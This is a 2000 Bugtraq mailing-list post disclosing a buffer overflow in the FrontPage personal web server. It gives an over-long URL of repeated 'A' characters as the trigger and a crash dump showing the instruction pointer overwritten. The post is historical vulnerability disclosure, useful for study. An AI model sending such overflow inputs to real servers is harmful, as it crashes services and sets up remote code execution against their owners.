[14634] in bugtraq
Re: More vulnerabilities in FP
daemon@ATHENA.MIT.EDU (Roman)
Mon Apr 24 13:17:39 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <12927.000422@mail.ru>
Date: Sat, 22 Apr 2000 22:16:18 +0200
Reply-To: Roman <webmad@mail.ru>
From: Roman <webmad@MAIL.RU>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Hello,
> First remote FrontPage exploit?
How about this one:
http://server/AAAAAAAAAAAA<a lots of A>AAAAAA
FP will overflow and someone will see this message:
VHTTPD32 caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212
EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141
ECX=00fe52c4 DS=016f ESI=00fe7744 FS=3647
EDX=bffc9490 ES=016f EDI=bff94645 GS=0000
Bytes at CS:EIP:
Stack dump:
41414141 41414141 66204141 656c6961 6f662064 32312072
2e302e37 2c312e30 61657220 3a6e6f73 6c696620 6f642065
6e207365 6520746f 74736978 00000000
Tested on FP 3.0.2.926. Maybe others?
